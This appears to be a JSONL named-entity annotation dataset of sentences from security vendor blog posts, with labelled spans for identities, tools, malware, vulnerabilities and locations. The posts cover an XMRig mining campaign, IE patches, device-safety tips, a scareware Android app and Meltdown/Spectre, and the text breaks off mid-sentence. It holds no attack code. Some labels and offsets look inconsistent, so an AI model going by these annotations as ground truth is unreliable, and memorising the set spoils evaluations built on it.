{"id":2921,"text":" Unit 42 has just released new research showing that attackers are indeed continuing to adapt existing techniques to generate cryptocurrency.","entities":[{"id":48091,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":2922,"text":" In our research posting “Large Scale Monero Cryptocurrency Mining Operation using XMRig” we detail a new malware campaign that is global in scale, very large in the likely number of victims and uses well established techniques to mine the Monero cryptocurrency.","entities":[{"id":48092,"label":"SOFTWARE","start_offset":38,"end_offset":44},{"id":48094,"label":"SOFTWARE","start_offset":240,"end_offset":246},{"id":48093,"label":"tools","start_offset":83,"end_offset":88}],"relations":[],"Comments":[]} {"id":2923,"text":" Monero is a cryptocurrency similar to bitcoin but notable for its increased emphasis on providing a higher level of privacy around its transactions.","entities":[{"id":48095,"label":"SOFTWARE","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":2924,"text":"Like bitcoin, Monero is generated through “mining” a computationally intensive process that provides cryptocurrency credit in exchange for computing resources provided in service to the cryptocurrency and its transaction infrastructure.","entities":[{"id":48096,"label":"SOFTWARE","start_offset":14,"end_offset":20}],"relations":[],"Comments":[]} {"id":2925,"text":" The operation that Unit 42 has recently uncovered works to deliver XMRig, software that is used to mine the Monero cryptocurrency, to victims’ systems without their knowledge or consent.","entities":[{"id":45744,"label":"identity","start_offset":20,"end_offset":27},{"id":45745,"label":"tools","start_offset":68,"end_offset":73},{"id":45746,"label":"SOFTWARE","start_offset":109,"end_offset":115}],"relations":[],"Comments":[]} {"id":2926,"text":"While XMRig isn’t itself specifically malware, it’s being delivered using malware-delivery techniques without the user’s knowledge and consent just like malware.","entities":[{"id":48097,"label":"tools","start_offset":6,"end_offset":11}],"relations":[],"Comments":[]} {"id":2927,"text":"The attackers are doing this by using URL shorteners to make XMRig look like other, legitimate, and expected programs.","entities":[{"id":48098,"label":"tools","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} {"id":2928,"text":"This is a method attackers have used for years to deliver malware and they are using it now to get coinmining software on to people’s systems illicitly.","entities":[],"relations":[],"Comments":[]} {"id":2929,"text":" The attackers’ use of URL shortners enables our Unit 42 researchers to get an idea of the size, scope, and scale of this operation.","entities":[{"id":48099,"label":"identity","start_offset":49,"end_offset":68}],"relations":[],"Comments":[]} {"id":2930,"text":"And these are all notable and sobering.","entities":[],"relations":[],"Comments":[]} {"id":2931,"text":" First, this is a young campaign.","entities":[],"relations":[],"Comments":[]} {"id":2932,"text":"Our research shows this operation to be only about four months old.","entities":[],"relations":[],"Comments":[]} {"id":2933,"text":" Second, this is a very large campaign.","entities":[],"relations":[],"Comments":[]} {"id":2934,"text":"Our researchers can show that about one-half of the samples we found have affected 15 million people worldwide.","entities":[],"relations":[],"Comments":[]} {"id":2935,"text":"While we can’t see how many people the other half of the samples affect, it’s a reasonable supposition that the other half of the total samples affect just as many people as the half we can see.","entities":[],"relations":[],"Comments":[]} {"id":2936,"text":"This would mean that this operation may affect about 30 million people worldwide.","entities":[],"relations":[],"Comments":[]} {"id":2937,"text":" In terms of who’s been affected by this operation, again, we can only see half of those who have been affected.","entities":[],"relations":[],"Comments":[]} {"id":2938,"text":"But what we do see shows that this is a truly global operation.","entities":[],"relations":[],"Comments":[]} {"id":2939,"text":"This operation affected countries around the globe, but it appears that southeast Asia, northern Africa, and countries in South America were hit the most as shown below. Malicious downloads by country The specific breakout of countries affected, and their download counts are as follows: Taking all those points together, this is operation is very large and clearly very effective.","entities":[{"id":48103,"label":"attack-pattern","start_offset":171,"end_offset":190},{"id":48100,"label":"location","start_offset":72,"end_offset":86},{"id":48101,"label":"location","start_offset":88,"end_offset":103},{"id":48102,"label":"location","start_offset":122,"end_offset":135}],"relations":[],"Comments":[]} {"id":2940,"text":"It shows how attackers are aggressively focusing their operations and campaigns on generating and acquiring cryptocurrency.","entities":[],"relations":[],"Comments":[]} {"id":2941,"text":" From a threat point of view, there are two things that are notable.","entities":[],"relations":[],"Comments":[]} {"id":2942,"text":" First is the fact that from an attack technique point of view, there is nothing new here.","entities":[],"relations":[],"Comments":[]} {"id":2943,"text":"The tactics and techniques are not new or sophisticated.","entities":[],"relations":[],"Comments":[]} {"id":2944,"text":" Second is the fact that this operation is clearly very successful based on its size, scope, and age.","entities":[],"relations":[],"Comments":[]} {"id":2945,"text":" Looking at this latest operation on the continuum of evolving cryptocurrency-focused threats, it’s clear that this is an early-stage threat given its lack of sophistication and reuse of established techniques and tactics.","entities":[],"relations":[],"Comments":[]} {"id":2946,"text":"But given how quickly and broadly successful it is, combined with the continued high value of cryptocurrencies, we can also conclude that attackers will continue to focus on cryptocurrency and likely will evolve their techniques and tactics quickly.","entities":[],"relations":[],"Comments":[]} {"id":2947,"text":"Cryptocurrency-focused threats is a key area that all defenders should focus their intelligence and prevention efforts around in 2018.","entities":[],"relations":[],"Comments":[]} {"id":2948,"text":" Meanwhile, see our full research blog for full details on how attackers are distributing and using XMRig to generate Monero. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":48104,"label":"tools","start_offset":100,"end_offset":105}],"relations":[],"Comments":[]} {"id":2949,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2950,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2951,"text":"Today, Microsoft patched 59 Internet Explorer vulnerabilities, 21 of them discovered by Palo Alto Networks researchers.","entities":[{"id":48106,"label":"identity","start_offset":88,"end_offset":106},{"id":48105,"label":"identity","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} {"id":2952,"text":"Palo Alto Networks is committed not only to detecting attacks, but preventing them as well.","entities":[{"id":48107,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":2953,"text":" Our internal research team discovered each of these 21 vulnerabilities and reported them to Microsoft so they could begin building and testing patches.","entities":[{"id":48108,"label":"identity","start_offset":93,"end_offset":102}],"relations":[],"Comments":[]} {"id":2954,"text":"Microsoft has already credited our team with 14 previous IE vulnerabilities in 2014, bringing our total for the year up to 35.","entities":[{"id":48109,"label":"identity","start_offset":0,"end_offset":9},{"id":48110,"label":"SOFTWARE","start_offset":57,"end_offset":59},{"id":48111,"label":"TIME","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} {"id":2955,"text":"We want to acknowledge Palo Alto Networks researchers Bo Qu, Hui Gao, Royce Lu, Xin Ouyang and the entire IPS team for all of the hard work they’ve put into discovering and validating these vulnerabilities.","entities":[{"id":45750,"label":"identity","start_offset":61,"end_offset":68},{"id":45751,"label":"identity","start_offset":70,"end_offset":78},{"id":45752,"label":"identity","start_offset":80,"end_offset":90},{"id":45753,"label":"identity","start_offset":106,"end_offset":114},{"id":45749,"label":"identity","start_offset":54,"end_offset":59},{"id":45748,"label":"identity","start_offset":23,"end_offset":41}],"relations":[],"Comments":[]} {"id":2956,"text":" The table below provides a summary of the vulnerabilities and which versions of Internet Explorer they impact.","entities":[{"id":48112,"label":"SOFTWARE","start_offset":81,"end_offset":98}],"relations":[],"Comments":[]} {"id":2957,"text":" Internet Explorer is used in many of the networks Palo Alto Networks protects around the world and we’re doing our part to make it as secure as possible.","entities":[{"id":48114,"label":"SOFTWARE","start_offset":1,"end_offset":18},{"id":48113,"label":"identity","start_offset":51,"end_offset":69}],"relations":[],"Comments":[]} {"id":2958,"text":"Last week we released a series of IPS signatures to detect an advanced exploitation technique that takes advantage of ActiveX. In May, we linked a recent IE 0-day (CVE-2014-1776) to exploit code used against two other IE vulnerabilities exploited in the last 12 months.","entities":[{"id":45754,"label":"vulnerability","start_offset":164,"end_offset":177},{"id":45755,"label":"SOFTWARE","start_offset":154,"end_offset":156},{"id":45756,"label":"SOFTWARE","start_offset":218,"end_offset":220}],"relations":[],"Comments":[]} {"id":2959,"text":" Microsoft patched 129 IE vulnerabilities in all of 2013 and today’s release brings the 2014 total to 116.","entities":[{"id":48115,"label":"identity","start_offset":1,"end_offset":10},{"id":48116,"label":"SOFTWARE","start_offset":23,"end_offset":25},{"id":48117,"label":"TIME","start_offset":52,"end_offset":56},{"id":48118,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} {"id":2960,"text":"The faster the good guys track these down and get them patched, the harder we make the lives of the criminals looking to exploit them.","entities":[],"relations":[],"Comments":[]} {"id":2961,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2962,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2963,"text":"This time every year, people all over the world get new devices.","entities":[],"relations":[],"Comments":[]} {"id":2964,"text":"Regardless of what holiday(s) you may (or may not) celebrate, the end of the year is a time for people to give and receive some of the latest devices to come on to the market.","entities":[],"relations":[],"Comments":[]} {"id":2965,"text":" Nothing spoils a new gadget more than having some kind of security or privacy problem related to it.","entities":[],"relations":[],"Comments":[]} {"id":2966,"text":"After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device than trying to figure out what you need to do to use it with reasonable safety and privacy.","entities":[],"relations":[],"Comments":[]} {"id":2967,"text":" To that end, we’re providing some very basic, but critical steps that you, your family, your loved ones, and friends can take to ensure some basic security and privacy for new devices quickly and easily that can help you be safer and not spoil your unboxing fun. In the vein of the holiday spirit, we’re providing a list of twelve short, simple recommendations that can help you have a happy, safe, and private holiday season.","entities":[],"relations":[],"Comments":[]} {"id":2968,"text":" 1. Use a Password Manager:","entities":[],"relations":[],"Comments":[]} {"id":2969,"text":"Even though not all devices can use password managers directly, it’s still one of the best things you can set up.","entities":[],"relations":[],"Comments":[]} {"id":2970,"text":"PCs and Macs as well as smartphones and tablets increasingly support the use of password managers directly.","entities":[],"relations":[],"Comments":[]} {"id":2971,"text":"But even for devices that don’t, you can and should use a password manager to generate and store strong passwords for use on all devices in its vault.","entities":[],"relations":[],"Comments":[]} {"id":2972,"text":"Preferably, find a password manager that requires two-factor authentication. 2. Protect Your Home Routers and Wi-Fi:","entities":[],"relations":[],"Comments":[]} {"id":2973,"text":"In a home of computers, phones, tablets and IoT devices, nearly always the common point is the home router and Wi-Fi.","entities":[],"relations":[],"Comments":[]} {"id":2974,"text":"For most, it’s something they set up once and forget about.","entities":[],"relations":[],"Comments":[]} {"id":2975,"text":"But if you want to keep your home devices more secure, you need to make sure the underlying router and Wi-Fi are more secure.","entities":[],"relations":[],"Comments":[]} {"id":2976,"text":"Take time to ensure you have a good, complex, unguessable password.","entities":[],"relations":[],"Comments":[]} {"id":2977,"text":"This is where a password manager can help.","entities":[],"relations":[],"Comments":[]} {"id":2978,"text":"You may consider configuring it to not broadcast the SSID as well: that can make adding devices a little harder, but that means it’s even harder for people to try and join your home network. 3. Set up More Secure Accounts on Your PCs and Macs: PCs and Macs (both desktop and laptop) are still around and as important as ever in the home.","entities":[],"relations":[],"Comments":[]} {"id":2979,"text":"Take time to set up an account for everyone with their own username and password.","entities":[],"relations":[],"Comments":[]} {"id":2980,"text":"Also, all modern operating systems allow you to make accounts “regular user” accounts rather than admin accounts.","entities":[],"relations":[],"Comments":[]} {"id":2981,"text":"Set everyone up as a “regular user” and set up a separate administrative account to use for maintenance.","entities":[],"relations":[],"Comments":[]} {"id":2982,"text":"If you have kids, avoid the temptation to let them all use one account or accounts without passwords: this is a chance for them to start to learn the right way to handle passwords by giving them their own and teaching them to never share that password.","entities":[],"relations":[],"Comments":[]} {"id":2983,"text":"You can generate the password for them and retain it as the “administrator” if you want for monitoring.","entities":[],"relations":[],"Comments":[]} {"id":2984,"text":"This also is an important lesson for kids to understand that privacy on computers isn’t absolute: the admin can always look at what they’re doing.","entities":[],"relations":[],"Comments":[]} {"id":2985,"text":" 4. Prevent Lost Tablets and Smartphones from Turning into Something Worse: Portable devices means an increased risk of loss or theft.","entities":[],"relations":[],"Comments":[]} {"id":2986,"text":"These days, our portable devices often have greater access to more sensitive information than our PCs and Macs do – in the form of mobile banking apps, wallet apps and stored credit cards.","entities":[],"relations":[],"Comments":[]} {"id":2987,"text":"All modern tablets and smartphones have settings you should enable before you take these portable devices out of your home: a. Passcodes to lock the device.","entities":[],"relations":[],"Comments":[]} {"id":2988,"text":"b. Encryption of information on the device.","entities":[],"relations":[],"Comments":[]} {"id":2989,"text":"c. Lost device location.","entities":[],"relations":[],"Comments":[]} {"id":2990,"text":"d. Deleting or “wiping” data if too many bad passcodes are tried or if you active it remotely.","entities":[],"relations":[],"Comments":[]} {"id":2991,"text":" 5. Protect your Data on Smartwatches and Personal Fitness Devices: Smartwatches and personal fitness devices are similar to smartphones and tablets and have some of the same features.","entities":[],"relations":[],"Comments":[]} {"id":2992,"text":"In addition to using those features, you should take time to ensure you know what health information is being used and that the cloud account(s) these devices synchronize with have very strong passwords.","entities":[],"relations":[],"Comments":[]} {"id":2993,"text":"These devices gather some of your most personal information.","entities":[],"relations":[],"Comments":[]} {"id":2994,"text":"In some cases, the most serious risk isn’t around the device but the data being stored in the cloud.","entities":[],"relations":[],"Comments":[]} {"id":2995,"text":" 6. Be Smart with Your Smart Home: Smart home is an umbrella term for a diverse set of devices that have one thing in common: they all feature some kind of internet connectivity.","entities":[],"relations":[],"Comments":[]} {"id":2996,"text":"Each and every device will have its own security and privacy settings and it pays to take time to understand those BEFORE you put these to work in your home.","entities":[],"relations":[],"Comments":[]} {"id":2997,"text":"Across the board, though, making sure your home router and Wi-Fi have good security and that you’re using good, strong unique passwords when paring devices with apps (where possible) are easy things you can do for all these devices.","entities":[],"relations":[],"Comments":[]} {"id":2998,"text":" 7. Don’t Forget About Home Entertainment Apps, TVs and DVRs:","entities":[],"relations":[],"Comments":[]} {"id":2999,"text":"When we think about home entertainment, there’s really two things you need to think about with security.","entities":[],"relations":[],"Comments":[]} {"id":3000,"text":"First is the security of the devices themselves.","entities":[],"relations":[],"Comments":[]} {"id":3001,"text":"In nearly all cases, good security around home routers and Wi-Fi will be the best thing you can do for the devices.","entities":[],"relations":[],"Comments":[]} {"id":3002,"text":"But home entertainment isn’t just the physical devices.","entities":[],"relations":[],"Comments":[]} {"id":3003,"text":"It’s the apps you use to view content.","entities":[],"relations":[],"Comments":[]} {"id":3004,"text":"All apps like those from Netflix, Amazon, Hulu and others have their own passwords to connect to their service, and attackers crack and sell compromised accounts to these services.","entities":[{"id":48120,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":48119,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":48121,"label":"SOFTWARE","start_offset":42,"end_offset":46}],"relations":[],"Comments":[]} {"id":3005,"text":"Because of this, make sure you’re using good, strong unique passwords for the apps you use on these devices.","entities":[],"relations":[],"Comments":[]} {"id":3006,"text":"This will also protect these apps on your tablets, smartphones, PCs and Macs.","entities":[],"relations":[],"Comments":[]} {"id":3007,"text":"While You’re at it, Protect Your Gaming Consoles:","entities":[],"relations":[],"Comments":[]} {"id":3008,"text":"Similar to home entertainment devices, gaming consoles have both the security of the actual device and then the security of the cloud-based accounts to deal with.","entities":[],"relations":[],"Comments":[]} {"id":3009,"text":"Just like with home entertainment devices, it’s the cloud-based account that attackers are more interested in.","entities":[],"relations":[],"Comments":[]} {"id":3010,"text":"Here again, taking time to set up good strong passwords is key.","entities":[],"relations":[],"Comments":[]} {"id":3011,"text":"Also, many gaming platforms now include a second means of authentication (typically a text sent to your phone): you can and should enable that, if at all possible.","entities":[],"relations":[],"Comments":[]} {"id":3012,"text":" 9. Configure User Profiles for Voice Assistants:","entities":[],"relations":[],"Comments":[]} {"id":3013,"text":"Voice assistants are some of the newest devices out there, which means they’re the least known and understood.","entities":[],"relations":[],"Comments":[]} {"id":3014,"text":"The biggest risk that’s been popularly discussed is voice command hijacking by outside sources.","entities":[],"relations":[],"Comments":[]} {"id":3015,"text":"While a cool news story, it’s not been documented to be a broad risk, especially as devices get better at specific voice recognition.","entities":[],"relations":[],"Comments":[]} {"id":3016,"text":"For these devices, take time to configure individual user profiles as much as possible.","entities":[],"relations":[],"Comments":[]} {"id":3017,"text":"And many of these devices feature mute buttons that can functionally turn them off when you don’t need them.","entities":[],"relations":[],"Comments":[]} {"id":3018,"text":"If you haven’t been using it, consider using that feature.","entities":[],"relations":[],"Comments":[]} {"id":3019,"text":" 10. Use Smart Speakers Smartly:","entities":[],"relations":[],"Comments":[]} {"id":3020,"text":"Smart speakers can be thought of as a subset of home assistants in that they are voice-activated devices in your home.","entities":[],"relations":[],"Comments":[]} {"id":3021,"text":"And many smart speakers have digital home assistants built into them, making the distinction even less clear.","entities":[],"relations":[],"Comments":[]} {"id":3022,"text":"This means that what you would do for security for your digital home assistant would apply to smart speakers as well.","entities":[],"relations":[],"Comments":[]} {"id":3023,"text":"However, one thing to consider is if all you really want or need is a smart music device, it may make sense to keep your purchases focused on devices that do only that.","entities":[],"relations":[],"Comments":[]} {"id":3024,"text":"This can improve your security by reducing the risk posed by features that you don’t want or need.","entities":[],"relations":[],"Comments":[]} {"id":3025,"text":"11. Drive Safely and Securely with Smart Cars:","entities":[],"relations":[],"Comments":[]} {"id":3026,"text":"While “car hacking” is something that you see in the news, the reality is that practical smart car security is more common than headlines may lead you to believe.","entities":[],"relations":[],"Comments":[]} {"id":3027,"text":"A key differentiating feature with smart cars is they often have “smart” lock and ignition systems that are tied to fobs and\/or your devices (like a smartphone).","entities":[],"relations":[],"Comments":[]} {"id":3028,"text":"Good smart car security in this case means building on the good security around devices and good physical security.","entities":[],"relations":[],"Comments":[]} {"id":3029,"text":"Ensure that any connected smart devices have good security, especially to protect against loss or theft.","entities":[],"relations":[],"Comments":[]} {"id":3030,"text":"Make sure you only give fobs to people that you trust.","entities":[],"relations":[],"Comments":[]} {"id":3031,"text":"And ensure that any cloud-connected accounts have good passwords and use a second authentication method, if possible.","entities":[],"relations":[],"Comments":[]} {"id":3032,"text":" 12. Patch, Patch and Patch Some More:","entities":[],"relations":[],"Comments":[]} {"id":3033,"text":"We close this list with patching because it is the most important thing you can do.","entities":[],"relations":[],"Comments":[]} {"id":3034,"text":"Few people like getting into the guts of devices to manage updates and the apps on them but the reality right now is that this is not only critical for security and privacy, it’s also sometimes a process that can only be done manually.","entities":[],"relations":[],"Comments":[]} {"id":3035,"text":"For every kind of device or system, you should think about and understand how you can do updates for: a.","entities":[],"relations":[],"Comments":[]} {"id":3036,"text":"The “firmware”: this is the software that is on the physical device itself, like the actual router, the actual car or the actual DVR.","entities":[],"relations":[],"Comments":[]} {"id":3037,"text":"b. The operating system on the device: Some devices don’t have an operating system separate from the firmware, but many do.","entities":[],"relations":[],"Comments":[]} {"id":3038,"text":"PCs and Macs have firmware and an operating system (Windows, macOS and Linux).","entities":[{"id":48122,"label":"SOFTWARE","start_offset":52,"end_offset":59},{"id":48123,"label":"SOFTWARE","start_offset":61,"end_offset":67},{"id":48124,"label":"SOFTWARE","start_offset":71,"end_offset":76}],"relations":[],"Comments":[]} {"id":3039,"text":"c. The apps and applications on the computer or device: Like we noted about home entertainment and gaming consoles, sometimes it’s the apps rather than the device itself that is important.","entities":[],"relations":[],"Comments":[]} {"id":3040,"text":"Many apps these days have auto-update capabilities.","entities":[],"relations":[],"Comments":[]} {"id":3041,"text":"But some don’t, so it’s important to make sure you know how apps get their updates.","entities":[],"relations":[],"Comments":[]} {"id":3042,"text":" If you take some time to understand these basic ideas and take these basic steps, you can ensure that you’ve got a good start on using new devices more safely and with better privacy during the holiday season. Of course, this isn’t an exhaustive list.","entities":[],"relations":[],"Comments":[]} {"id":3043,"text":"And it’s always good to know about other features and capabilities, for example child safety controls.","entities":[],"relations":[],"Comments":[]} {"id":3044,"text":"But the start of a journey of a thousand miles begins with one step, and the start of a journey of a thousand days of using these new devices safely can start with these simple steps.","entities":[],"relations":[],"Comments":[]} {"id":3045,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3046,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":3047,"text":"We have recently been investigating an antivirus app in the Google Play store that was displaying fake virus detection results to scare users into purchasing a premium service.","entities":[{"id":48125,"label":"SOFTWARE","start_offset":60,"end_offset":71}],"relations":[],"Comments":[]} {"id":3048,"text":"According to the Google Play store statistics, users have downloaded “AntiVirus for Android™” more than one million times and the app was listed in Top 100 free apps in Tools category.","entities":[{"id":45757,"label":"SOFTWARE","start_offset":17,"end_offset":29},{"id":45758,"label":"malware","start_offset":70,"end_offset":92}],"relations":[],"Comments":[]} {"id":3049,"text":"Our Wildfire analysis cloud captured the initial app and identified it as Scareware.","entities":[{"id":48126,"label":"SOFTWARE","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":3050,"text":" On January 20, we reported this issue to Google and two days later, they removed the app from Google Play.","entities":[{"id":48128,"label":"identity","start_offset":42,"end_offset":48},{"id":48127,"label":"TIME","start_offset":4,"end_offset":14},{"id":48129,"label":"SOFTWARE","start_offset":95,"end_offset":106}],"relations":[],"Comments":[]} {"id":3051,"text":" “AntiVirus for Android™” was developed by a company named “CTG Network Ltd.","entities":[{"id":45759,"label":"malware","start_offset":3,"end_offset":24},{"id":45760,"label":"identity","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} {"id":3052,"text":"”(Figure 1)","entities":[],"relations":[],"Comments":[]} {"id":3053,"text":"According the (now removed) Google Play listing, the app was downloaded and installed between 1 million and 5 millions times.","entities":[{"id":48130,"label":"SOFTWARE","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} {"id":3054,"text":"Before the removal it had also received 5,162 recommendations and 16,531 reviews that resulted in an average score of 4.0.","entities":[],"relations":[],"Comments":[]} {"id":3055,"text":"According to AppBrain, the app was also listed in top 30 of Top Grossing Apps in Tools category in United States, Japan, France and South Korea.","entities":[{"id":48132,"label":"location","start_offset":99,"end_offset":112},{"id":48131,"label":"identity","start_offset":13,"end_offset":21},{"id":48133,"label":"location","start_offset":114,"end_offset":119},{"id":48134,"label":"location","start_offset":121,"end_offset":127},{"id":48135,"label":"location","start_offset":132,"end_offset":143}],"relations":[],"Comments":[]} {"id":3056,"text":" Figure 1 AntiVirus for Android™ in the Google Play Store ","entities":[{"id":48136,"label":"malware","start_offset":10,"end_offset":32},{"id":48137,"label":"SOFTWARE","start_offset":40,"end_offset":57}],"relations":[],"Comments":[]} {"id":3057,"text":"When a user opens the app, it will always report that it has located two or three threats on the device (Figure 2), including the following: Figure 2","entities":[],"relations":[],"Comments":[]} {"id":3058,"text":"The App Indicates Two Threats were Found If the user clicks the “Repair” button, the apps will indicate that one of the threats was eliminated and advise the user to upgrade to its full version to remove the remaining threat(s).","entities":[],"relations":[],"Comments":[]} {"id":3059,"text":"If the user clicks the “Update to Full Protection” button they will be prompted to subscribe to a service that costs $4.99 (US) per month through In-App Purchase of Google Play (Figure 3). Figure 3","entities":[],"relations":[],"Comments":[]} {"id":3060,"text":"The app requests that the user pay 4.99$ per month for full protection.","entities":[],"relations":[],"Comments":[]} {"id":3061,"text":"Through analyzing the app’s code we discovered a multiple indications that this program was not a legitimate Antivirus program, but actually Scareware.","entities":[],"relations":[],"Comments":[]} {"id":3062,"text":"First, the initial “threats detection results” are hard-coded in the app (Figure 4), which means the app wasn't actually detecting them on the phone.","entities":[],"relations":[],"Comments":[]} {"id":3063,"text":"The developer even directly named these “infected packages” as “fake.virus” in the source code.","entities":[{"id":48138,"label":"FILEPATH","start_offset":64,"end_offset":74}],"relations":[],"Comments":[]} {"id":3064,"text":" Figure 4 Hard-coded fake threat detection results ","entities":[],"relations":[],"Comments":[]} {"id":3065,"text":"Since the detection result is fake, the subsequent cleaning is not real either – the elimination operation is just marking a flag of \"initial_virus_cleared\" to “1” in the app’s internal database.","entities":[],"relations":[],"Comments":[]} {"id":3066,"text":"The code in Figure 5 shows that the “We have eliminated 1 of %d Threat(s)” message shown in Figure 3 is also hard coded.","entities":[],"relations":[],"Comments":[]} {"id":3067,"text":"Figure 5 Code that generated the fake threat cleared page.","entities":[],"relations":[],"Comments":[]} {"id":3068,"text":" One interesting difference between this program and other Fake AV apps is “AntiVirus for Android™” will actually provide real antivirus services to paid users.","entities":[{"id":48139,"label":"malware","start_offset":76,"end_offset":98}],"relations":[],"Comments":[]} {"id":3069,"text":"The app integrates a mobile antivirus engine provided by Bitdefender and if users upgrade to the premium version, it will scan apps and the device’s SD card with that engine.","entities":[],"relations":[],"Comments":[]} {"id":3070,"text":"This is the main reason we classify the program as Scareware rather than just Fake AV.","entities":[],"relations":[],"Comments":[]} {"id":3071,"text":" It is not clear whether the integrated BitDefender AV engine is actually licensed to the app’s developer.","entities":[{"id":48140,"label":"SOFTWARE","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} {"id":3072,"text":"The engine retrieves code updated and new signatures updating from hxxp:\/\/ api.androidsantivirus .com \/antivirus\/android-arm, which is hosted on the app’s official website.","entities":[{"id":45761,"label":"URL","start_offset":67,"end_offset":124}],"relations":[],"Comments":[]} {"id":3073,"text":" Figure 6 The App Integrates the BitDefender AV Engine for Premium Users ","entities":[{"id":9395,"label":"SOFTWARE","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} {"id":3074,"text":"In March of 2014, a Fake AV app named “Virus Shield” was listed for sale at $3.99 and quickly rose to the top position of Google Play’s New Paid Apps list.","entities":[{"id":48141,"label":"malware","start_offset":39,"end_offset":51},{"id":48142,"label":"SOFTWARE","start_offset":122,"end_offset":134},{"id":48143,"label":"TIME","start_offset":3,"end_offset":16}],"relations":[],"Comments":[]} {"id":3075,"text":"Virus Shield was downloaded over 30,000 times, fare fewer than this latest piece of Scareware, although we do not know how many users actually paid for the $4.99 monthly service before Google removed the app from the store.","entities":[{"id":45762,"label":"identity","start_offset":185,"end_offset":191},{"id":45763,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":3076,"text":" The fact that AntiVirus for Android™ contains an actual AV engine makes it more difficult for other programs to identify it as Scareware, as this makes the program appear legitimate.","entities":[{"id":48144,"label":"malware","start_offset":15,"end_offset":37}],"relations":[],"Comments":[]} {"id":3077,"text":"While Google has already removed this application from the Play store, we’ll keep monitoring the latest Android apps to make sure WildFire is providing the best protection for our customers.","entities":[{"id":48145,"label":"identity","start_offset":6,"end_offset":12},{"id":48147,"label":"SOFTWARE","start_offset":104,"end_offset":111},{"id":48148,"label":"SOFTWARE","start_offset":130,"end_offset":138},{"id":48146,"label":"SOFTWARE","start_offset":59,"end_offset":69}],"relations":[],"Comments":[]} {"id":3078,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3079,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":3080,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3081,"text":"This post is also available in: 日本語 (Japanese) Bottom line","entities":[],"relations":[],"Comments":[]} {"id":3082,"text":"up front","entities":[],"relations":[],"Comments":[]} {"id":3083,"text":" Overview ","entities":[],"relations":[],"Comments":[]} {"id":3084,"text":"In the past 48 hours, there has been a flurry of activity as hardware and software vendors move to address two sets of vulnerabilities that have been dubbed “Meltdown” and “Spectre”.","entities":[{"id":45764,"label":"vulnerability","start_offset":158,"end_offset":166},{"id":45765,"label":"vulnerability","start_offset":173,"end_offset":180},{"id":9420,"label":"TIME","start_offset":3,"end_offset":20}],"relations":[],"Comments":[]} {"id":3085,"text":" This blog is meant to give an overview of the situation, the vulnerabilities, assist Palo Alto Networks customers and others with their risk assessment, and provide recommendations for actions they can take to prevent successful attacks against these vulnerabilities.","entities":[{"id":48149,"label":"identity","start_offset":86,"end_offset":104}],"relations":[],"Comments":[]} {"id":3086,"text":" Situation ","entities":[],"relations":[],"Comments":[]} {"id":3087,"text":"On January 3, 2018, researchers, including those with Google Project Zero, released information on three new vulnerabilities:","entities":[{"id":48150,"label":"TIME","start_offset":3,"end_offset":18},{"id":45766,"label":"identity","start_offset":54,"end_offset":73}],"relations":[],"Comments":[]} {"id":3088,"text":" They grouped these vulnerabilities under the names “Spectre” (CVE-2017-5753 and CVE-2017-5715) and “Meltdown” (CVE-2017-5754).","entities":[{"id":48151,"label":"vulnerability","start_offset":63,"end_offset":76},{"id":48152,"label":"vulnerability","start_offset":81,"end_offset":94},{"id":48153,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":48154,"label":"vulnerability","start_offset":53,"end_offset":60},{"id":48155,"label":"vulnerability","start_offset":101,"end_offset":109}],"relations":[{"id":388,"from_id":48154,"to_id":48151,"type":"related-to"}],"Comments":[]} {"id":3089,"text":" Comprehensive details on both of these are available at https:\/\/meltdownattack.com.","entities":[{"id":9439,"label":"URL","start_offset":57,"end_offset":83}],"relations":[],"Comments":[]} {"id":3090,"text":" Security updates to address these vulnerabilities began to be released prior to disclosure on January 3, 2018.","entities":[{"id":45767,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} {"id":3091,"text":"Security updates are continuing to be released and are expected to be released over time due to the uniquely broad nature of these vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3092,"text":" At the time of this writing, there are no known active attacks against any of these vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3093,"text":" Vulnerabilities These vulnerabilities present a unique situation because they ultimately are hardware-based vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3094,"text":"All three stem from issues in modern processors and are known to affect Intel and ARM chips.","entities":[],"relations":[],"Comments":[]} {"id":3095,"text":"The vulnerability status of AMD chips is unclear at the time of this writing.","entities":[],"relations":[],"Comments":[]} {"id":3096,"text":" Because these affect processors, this means that the operating systems and applications that run on top of these processors are 